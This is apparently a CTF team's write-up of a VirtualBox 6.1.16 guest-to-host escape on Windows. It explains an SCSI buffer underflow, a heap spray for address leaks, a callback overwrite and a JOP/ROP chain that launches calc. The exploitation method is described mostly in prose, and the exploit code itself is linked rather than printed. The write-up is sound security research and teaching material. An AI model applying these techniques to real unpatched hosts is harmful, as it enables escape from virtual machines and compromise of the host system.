This post is about a VirtualBox VM escape exploit that existed in VirtualBox 6.1.16 on Windows.
Many thanks to the organizers for hosting this great competition, especially to ChenNan for creating this challenge, M4x for always being helpful, answering our questions and sitting with us through the many demo attempts and of course all the people involved in writing the exploit.
Let’s get to some pwning 😀
Discovering the Vulnerability
The challenge description already hints at where a bug might be:
Please escape VirtualBox and spawn a calc(“C:\Windows\System32\calc.exe”) on the host operating system.
You have the full permissions of the guest operating system and can do anything in the guest, including loading drivers, etc.
But you can’t do anything in the host, including modifying the guest configuration file, etc.
Hint: SCSI controller is enabled and marked as bootable.
In order to ensure a clean environment, we use virtual machine nesting to build the environment. The details are as follows:
- Host: Windows10_20H2_x64 Virtual machine in Vmware_16.1.0_x64.
- Guest: Windows7_sp1_x64 Virtual machine in VirtualBox_6.1.16_x64.
The only special thing about the VM is that the
SCSI driver is loaded and marked bootable so that’s the place for us to start looking for vulnerabilities.
Here are the operations the
SCSI device supports:
SCSI device implements a simple state machine with a global heap allocated buffer. When initiating the state machine, we can set the buffer size and the state machine will set a global buffer pointer to point to the start of said buffer. From there on, we can either read one or more bytes, or write one or more bytes. Every read/write operation will advance the buffer pointer. This means that after reading a byte from the buffer, we can’t write that same byte and vice versa, because the buffer pointer has already been advanced.
We can fully control
cbTransfer in this function. The function initially makes sure that we’re not trying to read more than the buffer size
. Then, it copies
cbTransfer bytes from the global buffer into another buffer
, which will be sent to the guest driver. Finally,
cbTransfer bytes get subtracted from the remaining size of the buffer
 and if that remaining size hits zero, it will reset the SCSI device and require the user to reinitiate the machine state, before reading any more bytes.
So much for the logic, but what’s the issue here? There is a check at
 that ensures no single read operation reads more than the buffer’s size. But this is the wrong check. It should verify, that no single read can read more than the buffer has left. Let’s say we allocate a buffer with a size of 40 bytes. Now we call this function to read 39 bytes. This will advance the buffer pointer to point to the 40th byte. Now we call the function again and tell it to read 2 more bytes. The check in
 won’t bail out, since 2 is less than the buffer size of 40, however we will have read 41 bytes in total. Additionally, this will cause the subtraction in
 to underflow and
cbBufLeft will be set to
UINT32_MAX-1. This same
cbBufLeft will be checked when doing write operations and since it is very large now, we’ll be able to also write bytes that are outside of our buffer.
Getting OOB read/write
We understand the vulnerability, so it’s time to develop a driver to exploit it. Ironically enough, the “getting a driver to build” part was actually one of the hardest (and most annoying) parts of the exploit development. malle got to building VirtualBox from source in order for us to have symbols and a debuggable process while 0x4d5a came up with the idea of using the HEVD driver as a base for us to work with, since it does some similar things to what we need. Now let’s finally start writing some code.
Here’s how we triggered the bug:
The driver first has to initiate the
SCSI state machine with a
bufsize. Then we read
bufsize-1 bytes and then we read 9 bytes. We chose 9 instead of 2 byte in order to have the buffer pointer 8 byte aligned after the overflow. Finally, we overwrite the next 10000kb after our allocated
After loading this driver in the win7 guest, this is what we get:
As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user-space. The driver was modified to accept this
Req struct via an
This enables us to use the driver as a bridge to communicate with the
SCSI device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).
The bug gives us a liner heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution so let’s put this bug to use!
vboxc.dll and heap addresses
We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.
This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:
- Contains a pointer into a dll
- Contains a heap address
- (Contains some kind of function pointer which might get useful later on)
After going through some options, we eventually opted for an
HGCMMsgCall spray. Here’s it’s (stripped down) structure. It’s pretty big so I removed any parts that we don’t care about:
It contains a
VTable pointer, two heap pointers (
HGCMMsgCall objects are managed in a doubly linked list and it has a callback function pointer in
HGCMMsgCall definitely fits the bill for a good spray target. Another nice thing is that we’re able to call the
pHGCMPort->pfnIsCmdCancelled pointer at any point we like. This works because this pointer gets invoked on all the already allocated messages, whenever a new message is created.
HGCMMsgCall’s size is
0x70, so we’ll have to initiate the
SCSI state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.
wait_prop function will allocate a
HGCMMsgCall object with a controlled
pszPatterns field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.
Spraying on a Low-fragmentation Heap can be a little tricky but after some trial and error we got to the following spray strategy:
- We iterate 64 times
- Each time we create a client and spray 16
That way, we seemed to reliably get a bunch of the
HGCMMsgCalls ahead of our leak object which allows us to read and write their fields.
First things first: getting the code leak is simple enough. All we have to do is to read heap memory until we find something that matches the structure of one of our
HGCMMsgCall and read the first quad-word of said object. The
VTable points into
VBoxC.dll so we can use this leak to calculate the base address of
VBoxC.dll for future use.
Getting the heap leak is not as straight forward. We can easily read the
m_pPrev fields to get a pointer to some other
HGCMMsgCall object but we don’t have any clue about where that object is located relatively to our current buffer position. So reading
m_pPrev of one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse some of their properties to match an object
A to it’s next neighbor
This works because of this property:
To get the address of
B, we have to do the following:
- Read object
Aand save the pointers
- Take note of how many bytes we had to read until we found the next object
Bin a variable
- Read object
Band save the pointers
A->m_pNext - B->m_pPrev == xwe most likely found the right neighbor and know that
A->m_pNext. If not, we just keep reading objects
This is pretty fast and works somewhat reliably. Equipped with our heap address and
VBoxC.dll base address leak, we can move on to hijacking the execution flow.
Getting RIP control
pfnIsCmdCancelled callbacks? Those will make for a very short “Getting RIP control” section… 😛
There’s really not that much to this part of the exploit. We only have to read heap data until we find another one of our
HGCMMsgCalls and overwrite
m_pfnCallback. As soon as a new message gets allocated, this method is called on our corrupted object with a malicious
svcHlpIsCallCancelled will load
r8 and execute a
jmp [r8+0x10] instruction. Here’s what happens if we corrupt
At this point, we are able to redirect code execution to anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these
one-gadgets which are basically addresses you jump to, that will instantly give you a shell. But sadly there is no
leak-kernel32dll-set-rcx-to-calc-and-call-WinExec one-gadget in
VBoxC.dll which means we’ll have to get a little creative once more. ROP is not an option because we don’t have stack control so the only thing left is JOP (Jump-Oriented-Programming).
JOP requires some kind of register control, but at the point at which our callback is invoked we only control a single register,
r8. An additional constraint is that since we only leaked a pointer from
VBoxC.dll we’re limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.
Sounds easy enough, let’s see what we can come up with 😛
Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that’ll have to do. But we can’t just go around writing stuff to the heap because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt us. So we need to get a buffer allocated first and write to that. We can abuse the
pszPatterns field in out spray for that. If we extend the pattern size to
0x70 bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining
0x68 bytes with our payload. We’re the ones who allocated that string so it won’t get free’d randomly so long as we hold a reference to it and since we already leaked a heap address, we’re also able to calculate the address of our string and can use it in the JOP chain.
After spending ~30min straight reading through
VBoxC.dll assembly together with localo, we finally came up with a way to get from
r8 control to
rsp control. I had trouble figuring out a way to describe the JOP chain, so css wizard localo created an interactive visualization in order to make following the chain easier. To simplify things even further, the visualization will show all registers with uncontrolled contents as
XXX and any reading or uncontrolled writing operations to or from those registers will be ignored.
Let’s assume the JOP payload in our string is located at
r8 points to it. We trigger the callback, which will execute the
jmp [r8+0x10]. You can click through the slides to understand what happens:
We managed to get
rsp to point into our string and the next
ret will kickstart ROP execution. From this point on, it’s just a matter of crafting a textbook
WinExec("calc\x00") ROP-chain. But for the sake of completeness I’ll mention the gist of it. First, we read the address of a symbol from
IAT is comparable to a global offset table on linux and contains pointers to dynamically linked library symbols. We’ll use this to leak a pointer into
kernel32.dll. Then we can calculate the runtime address of
rcx to point to
"calc\x00" and call
WinExec which will pop a calculator.
However there is a little twist to this. A keen eye might have noticed that we set
0x10000000 and that we are using a
leave; jmp rax gadget to get to
rop_gadget_5 instead of just a simple
jmp rax. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling
WinExec with the stack pointer still pointing into our heap payload. It turns out, that
WinExec sets up a rather large stack frame and the distance between out fake stack and the start of the heap isn’t always large enough to contain it. Therefore we were getting paging issues. Luckily, 0x4d5a and localo knew from reading this blog post about the
vram section which has weak randomisation and it turns out that the range from
0x13220000 is always mapped by that section. So if we set
0x10000000 and call a
leave; jmp rax it will set the stack pointer to
0x10000000 before calling
WinExec and thereby giving it enough space to do all the stack setup it likes 😉
‘nuff said! Here’s the demo:https://www.youtube.com/embed/mjKxafMbpS0
You can find this version of our exploit here.
Writing this exploit was a joint effort of a bunch of people.
- ESPR’s spq, tsuro and malle who don’t need an introduction 😀
- My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo
- niklasb for his prior work and for some helpful pointers!
“A ROP chain a day keeps the doctor away. Immer dran denken, hat mein Opa immer gesagt.”
~ Niklas Baumstark (2021)
I had the pleasure of working with this group of talented people over the course of multiple sleepless nights and days during and even after the CTF was already over just to get the exploit working properly on a release build of VirtualBox and to improve stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you 😀
This was my first time working with VirtualBox so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of virtual box with 3h left in the CTF but sadly, we weren’t able to port it to a release build in time for the CTF due to anti-debugging in VirtualBox which made figuring out what exactly was breaking very hard. The next day we rebuilt VirtualBox without the anti-debugging/process hardening and finally properly ported the exploit to work with the latest release build of VirtualBox.